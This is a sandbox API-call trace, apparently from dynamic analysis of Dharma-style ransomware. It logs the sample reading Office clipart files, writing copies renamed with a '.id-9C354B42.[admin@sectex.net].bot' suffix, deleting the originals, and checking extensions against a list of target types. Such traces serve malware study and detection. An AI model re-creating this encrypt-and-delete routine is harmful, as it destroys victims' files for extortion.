	[0150.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090027.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0150.180] GetLastError () returned 0x0
	[0150.180] ReadFile (in: hFile=0x3ec, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x5314, lpOverlapped=0x0) returned 1
	[0150.183] WriteFile (in: hFile=0x3e8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x5320, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x5320, lpOverlapped=0x0) returned 1
	[0150.184] ReadFile (in: hFile=0x3ec, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.184] WriteFile (in: hFile=0x3e8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.184] SetEndOfFile (hFile=0x3e8) returned 1
	[0150.184] CloseHandle (hObject=0x3e8) returned 1
	[0150.184] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.184] SetEndOfFile (hFile=0x3ec) returned 1
	[0150.187] CloseHandle (hObject=0x3ec) returned 1
	[0150.187] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.229] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090027.wmf")) returned 1
	[0150.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63
	[0150.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63
	[0150.229] lstrlenW (lpString=".doc") returned 4
	[0150.229] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.229] lstrlenW (lpString=".docx") returned 5
	[0150.229] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0150.229] lstrlenW (lpString=".pdf") returned 4
	[0150.229] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.229] lstrlenW (lpString=".xls") returned 4
	[0150.229] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.229] lstrlenW (lpString=".xlsx") returned 5
	[0150.230] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0150.230] lstrlenW (lpString=".ppt") returned 4
	[0150.230] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63
	[0150.230] lstrlenW (lpString=".zip") returned 4
	[0150.230] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.230] lstrlenW (lpString=".rar") returned 4
	[0150.230] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.230] lstrlenW (lpString=".bz2") returned 4
	[0150.230] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.230] lstrlenW (lpString=".7z") returned 3
	[0150.230] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63
	[0150.230] lstrlenW (lpString=".dbf") returned 4
	[0150.230] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63
	[0150.230] lstrlenW (lpString=".1cd") returned 4
	[0150.230] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63
	[0150.230] lstrlenW (lpString=".jpg") returned 4
	[0150.230] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63
	[0150.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63
	[0150.338] lstrlenW (lpString=".doc") returned 4
	[0150.338] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.339] lstrlenW (lpString=".docx") returned 5
	[0150.339] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1
	[0150.339] lstrlenW (lpString=".pdf") returned 4
	[0150.339] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.339] lstrlenW (lpString=".xls") returned 4
	[0150.339] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.339] lstrlenW (lpString=".xlsx") returned 5
	[0150.339] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1
	[0150.339] lstrlenW (lpString=".ppt") returned 4
	[0150.339] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63
	[0150.339] lstrlenW (lpString=".zip") returned 4
	[0150.339] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.339] lstrlenW (lpString=".rar") returned 4
	[0150.339] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.339] lstrlenW (lpString=".bz2") returned 4
	[0150.339] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.339] lstrlenW (lpString=".7z") returned 3
	[0150.339] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63
	[0150.339] lstrlenW (lpString=".dbf") returned 4
	[0150.339] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63
	[0150.339] lstrlenW (lpString=".1cd") returned 4
	[0150.339] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090027.WMF") returned 63
	[0150.339] lstrlenW (lpString=".jpg") returned 4
	[0150.339] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.339] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.340] lstrlenW (lpString="J0090089.WMF") returned 12
	[0150.340] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090089.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0150.408] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=15760) returned 1
	[0150.408] CloseHandle (hObject=0x3c8) returned 1
	[0150.408] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090089.wmf")) returned 0x20
	[0150.429] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090089.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090089.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0150.430] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.430] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090089.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0150.430] GetLastError () returned 0x0
	[0150.430] ReadFile (in: hFile=0x3c8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x3d90, lpOverlapped=0x0) returned 1
	[0150.464] WriteFile (in: hFile=0x3b0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x3da0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x3da0, lpOverlapped=0x0) returned 1
	[0150.466] ReadFile (in: hFile=0x3c8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.466] WriteFile (in: hFile=0x3b0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.466] SetEndOfFile (hFile=0x3b0) returned 1
	[0150.466] CloseHandle (hObject=0x3b0) returned 1
	[0150.466] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.466] SetEndOfFile (hFile=0x3c8) returned 1
	[0150.468] CloseHandle (hObject=0x3c8) returned 1
	[0150.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.479] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090089.wmf")) returned 1
	[0150.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63
	[0150.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63
	[0150.508] lstrlenW (lpString=".doc") returned 4
	[0150.508] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.508] lstrlenW (lpString=".docx") returned 5
	[0150.508] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0150.509] lstrlenW (lpString=".pdf") returned 4
	[0150.509] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.509] lstrlenW (lpString=".xls") returned 4
	[0150.509] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.509] lstrlenW (lpString=".xlsx") returned 5
	[0150.509] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0150.509] lstrlenW (lpString=".ppt") returned 4
	[0150.509] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63
	[0150.509] lstrlenW (lpString=".zip") returned 4
	[0150.509] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.509] lstrlenW (lpString=".rar") returned 4
	[0150.509] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.509] lstrlenW (lpString=".bz2") returned 4
	[0150.509] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.509] lstrlenW (lpString=".7z") returned 3
	[0150.509] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63
	[0150.509] lstrlenW (lpString=".dbf") returned 4
	[0150.509] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63
	[0150.509] lstrlenW (lpString=".1cd") returned 4
	[0150.509] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63
	[0150.509] lstrlenW (lpString=".jpg") returned 4
	[0150.509] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63
	[0150.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63
	[0150.509] lstrlenW (lpString=".doc") returned 4
	[0150.509] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.509] lstrlenW (lpString=".docx") returned 5
	[0150.510] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1
	[0150.510] lstrlenW (lpString=".pdf") returned 4
	[0150.510] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.510] lstrlenW (lpString=".xls") returned 4
	[0150.525] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.525] lstrlenW (lpString=".xlsx") returned 5
	[0150.525] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1
	[0150.525] lstrlenW (lpString=".ppt") returned 4
	[0150.525] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63
	[0150.533] lstrlenW (lpString=".zip") returned 4
	[0150.533] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.534] lstrlenW (lpString=".rar") returned 4
	[0150.534] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.534] lstrlenW (lpString=".bz2") returned 4
	[0150.534] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.534] lstrlenW (lpString=".7z") returned 3
	[0150.534] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63
	[0150.534] lstrlenW (lpString=".dbf") returned 4
	[0150.534] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63
	[0150.534] lstrlenW (lpString=".1cd") returned 4
	[0150.534] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090089.WMF") returned 63
	[0150.534] lstrlenW (lpString=".jpg") returned 4
	[0150.534] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.534] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0150.534] lstrlenW (lpString="J0093905.WMF") returned 12
	[0150.534] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.539] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=42050) returned 1
	[0150.539] CloseHandle (hObject=0x3d0) returned 1
	[0150.539] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf")) returned 0x20
	[0150.845] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0150.859] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.859] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0150.860] GetLastError () returned 0x0
	[0150.860] ReadFile (in: hFile=0x3e0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xa442, lpOverlapped=0x0) returned 1
	[0150.878] WriteFile (in: hFile=0x3d4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xa450, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xa450, lpOverlapped=0x0) returned 1
	[0150.880] ReadFile (in: hFile=0x3e0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.880] WriteFile (in: hFile=0x3d4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0150.880] SetEndOfFile (hFile=0x3d4) returned 1
	[0150.880] CloseHandle (hObject=0x3d4) returned 1
	[0150.880] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.880] SetEndOfFile (hFile=0x3e0) returned 1
	[0150.883] CloseHandle (hObject=0x3e0) returned 1
	[0150.883] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.883] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf")) returned 1
	[0150.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63
	[0150.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63
	[0150.884] lstrlenW (lpString=".doc") returned 4
	[0150.884] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.884] lstrlenW (lpString=".docx") returned 5
	[0150.884] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0150.884] lstrlenW (lpString=".pdf") returned 4
	[0150.884] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.884] lstrlenW (lpString=".xls") returned 4
	[0150.884] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.884] lstrlenW (lpString=".xlsx") returned 5
	[0150.884] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0150.884] lstrlenW (lpString=".ppt") returned 4
	[0150.884] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63
	[0150.884] lstrlenW (lpString=".zip") returned 4
	[0150.884] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.884] lstrlenW (lpString=".rar") returned 4
	[0150.884] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.884] lstrlenW (lpString=".bz2") returned 4
	[0150.884] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.884] lstrlenW (lpString=".7z") returned 3
	[0150.884] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63
	[0150.885] lstrlenW (lpString=".dbf") returned 4
	[0150.885] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63
	[0150.885] lstrlenW (lpString=".1cd") returned 4
	[0150.885] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63
	[0150.885] lstrlenW (lpString=".jpg") returned 4
	[0150.885] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63
	[0150.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63
	[0150.885] lstrlenW (lpString=".doc") returned 4
	[0150.885] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0150.885] lstrlenW (lpString=".docx") returned 5
	[0150.885] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1
	[0150.885] lstrlenW (lpString=".pdf") returned 4
	[0150.885] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0150.885] lstrlenW (lpString=".xls") returned 4
	[0150.885] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0150.885] lstrlenW (lpString=".xlsx") returned 5
	[0150.885] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1
	[0150.885] lstrlenW (lpString=".ppt") returned 4
	[0150.885] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0150.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63
	[0150.885] lstrlenW (lpString=".zip") returned 4
	[0150.885] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0150.885] lstrlenW (lpString=".rar") returned 4
	[0150.885] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0150.885] lstrlenW (lpString=".bz2") returned 4
	[0150.886] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0150.886] lstrlenW (lpString=".7z") returned 3
	[0150.886] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0150.886] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63
	[0150.886] lstrlenW (lpString=".dbf") returned 4
	[0150.886] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0150.886] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63
	[0150.886] lstrlenW (lpString=".1cd") returned 4
	[0150.886] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0150.886] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 63
	[0150.886] lstrlenW (lpString=".jpg") returned 4
	[0150.886] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0150.886] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0150.886] lstrlenW (lpString="J0099147.JPG") returned 12
	[0150.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0150.887] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=24377) returned 1
	[0150.887] CloseHandle (hObject=0x3e0) returned 1
	[0150.887] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg")) returned 0x20
	[0150.887] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0150.887] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.887] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
